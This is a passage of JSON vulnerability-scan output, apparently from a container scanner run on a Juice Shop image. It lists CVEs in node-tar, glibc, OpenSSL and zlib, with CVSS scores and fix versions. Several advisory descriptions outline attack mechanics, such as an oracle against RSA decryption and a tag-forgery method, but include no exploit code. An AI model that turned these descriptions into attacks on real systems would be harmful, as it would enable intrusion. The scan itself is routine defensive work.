issue.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":5.9,"exploitabilityScore":2.3,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23950","epss":0.00153,"percentile":0.0475,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23950","cwe":"CWE-176","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-352","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"4.4.19"}},"found":{"vulnerabilityID":"GHSA-r6q2-hw4h-h46w","versionConstraint":"<=7.5.3 (semantic)"},"fix":{"suggestedVersion":"7.5.4"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-r6q2-hw4h-h46w","dataSource":"https://github.com/advisories/GHSA-r6q2-hw4h-h46w","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w","https://nvd.nist.gov/vuln/detail/CVE-2026-23950","https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6"],"description":"Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23950","epss":0.00153,"percentile":0.0475,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23950","cwe":"CWE-176","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-352","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["7.5.4"],"state":"fixed","available":[{"version":"7.5.4","date":"2026-01-22","kind":"first-observed"}]},"advisories":[],"risk":0.12469499999999999},"relatedVulnerabilities":[{"id":"CVE-2026-23950","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-23950","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6","https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w"],"description":"node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":5.9,"exploitabilityScore":2.3,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-23950","epss":0.00153,"percentile":0.0475,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-23950","cwe":"CWE-176","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-352","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-23950","cwe":"CWE-367","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-r6q2-hw4h-h46w","versionConstraint":"<=7.5.3 (semantic)"},"fix":{"suggestedVersion":"7.5.4"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"CVE-2019-9192","dataSource":"https://security-tracker.debian.org/tracker/CVE-2019-9192","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern","cvss":[],"epss":[{"cve":"CVE-2019-9192","epss":0.02447,"percentile":0.82202,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-9192","cwe":"CWE-674","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.12235},"relatedVulnerabilities":[{"id":"CVE-2019-9192","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-9192","namespace":"nvd:cpe","severity":"High","urls":["https://sourceware.org/bugzilla/show_bug.cgi?id=24269","https://support.f5.com/csp/article/K26346590?utm_source=f5support&%3Butm_medium=RSS"],"description":"In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:N/A:P","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-9192","epss":0.02447,"percentile":0.82202,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-9192","cwe":"CWE-674","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2019-9192","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-42768","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-42768","namespace":"debian:distro:debian:13","severity":"Low","urls":[],"description":"Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to Bleichenbacher-style attack when an attacker is able to provide the CMS or S/MIME messages and observe the error code and/or decryption output. Impact summary: The Bleichenbacher-style attack allows an attacker to use the victim's vulnerable application as a way to decrypt or sign messages with the victim's private RSA key. The attack is possible in 2 variants. 1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without providing the recipient certificate. In this case OpenSSL iterates over every KeyTransRecipientInfo (KTRI) without stopping at the first success. An attacker who authors a message with two KTRI entries — the first one wrapping a real CEK under the victim's public key, the second with an arbitrary probe ciphertext — obtains opportunity to iterate the 2nd KTRI to get a valid PKCS#1 v1.5 padding if the error code of the application is available. That is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an adaptive-chosen-ciphertext side channel from which the attacker decrypts any RSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under it. 2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with the recipient certificate, and the recipient is not found, a random key is substituted. An attacker who authors a message and is able to compare both error code and the result of the decryption, can mount a Bleichenbacher oracle. We are not aware of any applications that provide a remote attacker an opportunity to mount an attack described in these scenarios. We consider the existence of such application very unlikely, and for this reason this CVE has been evaluated as Low severity. To avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the invoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described in draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit rejection was explicitly disabled. The implicit rejection mechanism always returns a plaintext value, the symmetric key. This result is deterministic for the ciphertext and the private key. The length of the decryption result can happen to match the length of the key of the symmetric cipher that was used for the content encryption. When a certificate is not provided, the last RecipientInfo producing a key that looks valid will be used. It may cause getting garbage content on decryption. As a proper way to deal with this a recipient certificate has to be provided to identify the particular RecipientInfo for decryption. The FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as CMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":3.7,"exploitabilityScore":2.3,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42768","epss":0.00351,"percentile":0.26756,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42768","cwe":"CWE-514","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-10","kind":"first-observed"}]},"advisories":[],"risk":0.117585},"relatedVulnerabilities":[{"id":"CVE-2026-42768","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-42768","namespace":"nvd:cpe","severity":"Low","urls":["https://github.com/openssl/openssl/commit/a2ca7b2d73e0ffc1eae183fe6e1741dac767cb4f","https://github.com/openssl/openssl/commit/bbb151a83041705d9d001ed2f9c12f5523e1b54d","https://github.com/openssl/openssl/commit/dd68364107a58841c0a2546812518b65d3a23abd","https://github.com/openssl/openssl/commit/f04b377be3d821741c86d1f4bf84dee09f3d5c3e","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: The CMS_decrypt and PKCS7_decrypt functions are vulnerable to\nBleichenbacher-style attack when an attacker is able to provide the CMS or\nS/MIME messages and observe the error code and/or decryption output.\n\nImpact summary: The Bleichenbacher-style attack allows an attacker to use the\nvictim's vulnerable application as a way to decrypt or sign messages with the\nvictim's private RSA key.\n\nThe attack is possible in 2 variants.\n\n1. The decryption API (CMS_decrypt(), PKCS7_decrypt()) is used without\nproviding the recipient certificate. In this case OpenSSL iterates over every\nKeyTransRecipientInfo (KTRI) without stopping at the first success.\n\nAn attacker who authors a message with two KTRI entries — the first one\nwrapping a real CEK under the victim's public key, the second with an\narbitrary probe ciphertext — obtains opportunity to iterate the 2nd KTRI to\nget a valid PKCS#1 v1.5 padding if the error code of the application is\navailable.\n\nThat is a Bleichenbacher oracle (Bleichenbacher, CRYPTO '98): an\nadaptive-chosen-ciphertext side channel from which the attacker decrypts any\nRSA ciphertext to the victim's key or forges any PKCS#1 v1.5 signature under\nit.\n\n2. When the decryption API (CMS_decrypt(), PKCS7_decrypt()) is provided with\nthe recipient certificate, and the recipient is not found, a random\nkey is substituted.\n\nAn attacker who authors a message and is able to compare both error code and\nthe result of the decryption, can mount a Bleichenbacher oracle.\n\nWe are not aware of any applications that provide a remote attacker\nan opportunity to mount an attack described in these scenarios. We consider\nthe existence of such application very unlikely, and for this reason this\nCVE has been evaluated as Low severity.\n\nTo avoid these attacks, when RSA PKCS#1 v1.5 Key Transport is in use, the\ninvoked EVP_PKEY_decrypt() will use the implicit rejection mechanism described\nin draft-irtf-cfrg-rsa-guidance. In previous OpenSSL releases the implicit\nrejection was explicitly disabled.\n\nThe implicit rejection mechanism always returns a plaintext value,\nthe symmetric key. This result is deterministic for the ciphertext and the\nprivate key. The length of the decryption result can happen to match the\nlength of the key of the symmetric cipher that was used for the content\nencryption. When a certificate is not provided, the last RecipientInfo\nproducing a key that looks valid will be used. It may cause getting garbage\ncontent on decryption. As a proper way to deal with this a recipient\ncertificate has to be provided to identify the particular RecipientInfo for\ndecryption.\n\nThe FIPS modules in 4.0, 3.6, 3.5, and 3.4 are not affected by this issue, as\nCMS and S/MIME processing happens outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":3.7,"exploitabilityScore":2.3,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42768","epss":0.00351,"percentile":0.26756,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42768","cwe":"CWE-514","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-42768","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"CVE-2019-1010025","dataSource":"https://security-tracker.debian.org/tracker/CVE-2019-1010025","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is \"ASLR bypass itself is not a vulnerability.","cvss":[],"epss":[{"cve":"CVE-2019-1010025","epss":0.02286,"percentile":0.80883,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-1010025","cwe":"CWE-330","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":0.11429999999999998},"relatedVulnerabilities":[{"id":"CVE-2019-1010025","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010025","namespace":"nvd:cpe","severity":"Medium","urls":["https://security-tracker.debian.org/tracker/CVE-2019-1010025","https://sourceware.org/bugzilla/show_bug.cgi?id=22853","https://support.f5.com/csp/article/K06046097","https://support.f5.com/csp/article/K06046097?utm_source=f5support&%3Butm_medium=RSS","https://ubuntu.com/security/CVE-2019-1010025"],"description":"GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is \"ASLR bypass itself is not a vulnerability.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:P/I:N/A:N","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-1010025","epss":0.02286,"percentile":0.80883,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-1010025","cwe":"CWE-330","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"glibc","version":"2.41-12+deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2019-1010025","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&package-id=089516409246f602&upstream=glibc","name":"libc6","version":"2.41-12+deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libc6/copyright","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""},{"path":"/var/lib/dpkg/status.d/libc6.md5sums","layerID":"sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1","accessPath":""}],"language":"","licenses":["BSD-2-Clause","BSD-3-clause-Berkeley","BSD-3-clause-Carnegie","BSD-3-clause-Oracle","BSD-3-clause-WIDE","BSD-like-Spencer","BSL-1.0","CORE-MATH","Carnegie","DEC","FSFAP","GPL-2+-with-link-exception","GPL-2.0-only","GPL-2.0-or-later","GPL-3.0-only","GPL-3.0-or-later","IBM","ISC","Inner-Net","LGPL-2.0-only","LGPL-2.0-or-later","LGPL-2.1+-with-link-exception","LGPL-2.1-only","LGPL-2.1-or-later","LGPL-3.0-only","LGPL-3.0-or-later","MIT-like-Lord","PCRE","SunPro","Unicode-DFS-2016","Univ-Coimbra","public-domain"],"cpes":["cpe:2.3:a:libc6:libc6:2.41-12\\+deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64&distro=debian-13&upstream=glibc","upstreams":[{"name":"glibc"}]}},{"vulnerability":{"id":"CVE-2026-27171","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-27171","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":5.5,"exploitabilityScore":1.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-27171","epss":0.00204,"percentile":0.10341,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-27171","cwe":"CWE-1284","source":"cve@mitre.org","type":"Secondary"}],"fix":{"versions":[],"state":"wont-fix"},"advisories":[],"risk":0.10710000000000001},"relatedVulnerabilities":[{"id":"CVE-2026-27171","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-27171","namespace":"nvd:cpe","severity":"Medium","urls":["https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/","https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf","https://github.com/madler/zlib/issues/904","https://github.com/madler/zlib/releases/tag/v1.3.2","https://ostif.org/zlib-audit-complete/"],"description":"zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":5.5,"exploitabilityScore":1.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"cve@mitre.org","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":2.9,"exploitabilityScore":1.5,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-27171","epss":0.00204,"percentile":0.10341,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-27171","cwe":"CWE-1284","source":"cve@mitre.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"zlib","version":"1:1.3.dfsg+really1.3.1-1"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-27171","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/zlib1g@1%3A1.3.dfsg%2Breally1.3.1-1%2Bb1?arch=amd64&distro=debian-13&package-id=7bfd545dc64f4e5a&upstream=zlib%401%3A1.3.dfsg%2Breally1.3.1-1","name":"zlib1g","version":"1:1.3.dfsg+really1.3.1-1+b1","type":"deb","locations":[{"path":"/usr/share/doc/zlib1g/copyright","layerID":"sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0","accessPath":""},{"path":"/var/lib/dpkg/status.d/zlib1g","layerID":"sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0","accessPath":""},{"path":"/var/lib/dpkg/status.d/zlib1g.md5sums","layerID":"sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0","accessPath":""}],"language":"","licenses":["Zlib"],"cpes":["cpe:2.3:a:zlib1g:zlib1g:1\\:1.3.dfsg\\+really1.3.1-1\\+b1:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/zlib1g@1%3A1.3.dfsg%2Breally1.3.1-1%2Bb1?arch=amd64&distro=debian-13&upstream=zlib%401%3A1.3.dfsg%2Breally1.3.1-1","upstreams":[{"name":"zlib","version":"1:1.3.dfsg+really1.3.1-1"}]}},{"vulnerability":{"id":"CVE-2026-45446","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-45446","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) mishandle the authentication of AAD (Additional Authenticated Data) with an empty ciphertext allowing a forgery of such messages. Impact summary: An attacker can forge empty messages with arbitrary AAD to the victim's application using these ciphers. AES-SIV (RFC 5297) and AES-GCM-SIV (RFC 8452) are nonce-misuse-resistant AEAD modes: they accept a key, nonce, optional AAD (bytes that are authenticated but not encrypted), and plaintext, and produces ciphertext plus a 16-byte tag. On decrypt, `EVP_DecryptFinal_ex()` is documented to return success only if the tag is verified succesfully. In OpenSSL's provider implementation of these ciphers, the expected tag is computed only when decryption function is invoked with non-empty data. If the caller supplies AAD and then calls `EVP_DecryptFinal_ex()` without invocation of the ciphertext update, which can happen when the received ciphertext length is zero, the tag is never recalculated and still holds its all-zeros value. When AES-GCM-SIV is used, an attacker who sends arbitrary AAD, empty ciphertext, and all-zeros tag passes authentication under any key they do not know, single-shot. When AES-SIV is used, for mounting the attack it's necessary for the application to reuse the decryption context without resetting the key. AES-SIV is implemented since OpenSSL 3.0. AES-GCM-SIV is implemented since OpenSSL 3.2. No protocols implemented in OpenSSL itself (TLS/CMS/PKCS7/HPKE/QUIC) support either AES-GCM-SIV or AES-SIV. To mount an attack, the applications must implement their own protocol and use the EVP interface. Also they must skip the ciphertext update when a message with an empty ciphertext arrives. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as these algorithms are not FIPS approved and the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","metrics":{"baseScore":4.8,"exploitabilityScore":2.3,"impactScore":2.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45446","epss":0.0021,"percentile":0.11122,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45446","cwe":"CWE-325","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.10289999999999999},"relatedVulnerabilities":[{"id":"CVE-2026-45446","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-45446","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/openssl/openssl/commit/25b32cd9d41d2bc01b6abc425bb4baf2c2236fdc","https://github.com/openssl/openssl/commit/71e2a5d263518cf5866043bd60ee4994d59e53a3","https://github.com/openssl/openssl/commit/7fe3f33a3b3a4c487aa4dcdbc87057f66ffd2b85","https://github.com/openssl/openssl/commit/daca0f48e4a69a2892a62262bad59e62a8a76598","https://github.com/openssl/openssl/commit/eec5e9bf0d867333b8495e456f5235d225798a68","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: The implementations of AES-SIV (RFC 5297) and AES-GCM-SIV\n(RFC 8452) mishandle the authentication of AAD (Additional Authenticated\nData) with an empty ciphertext allowing a forgery of such messages.\n\nImpact summary: An attacker can forge empty messages with arbitrary AAD\nto the victim's 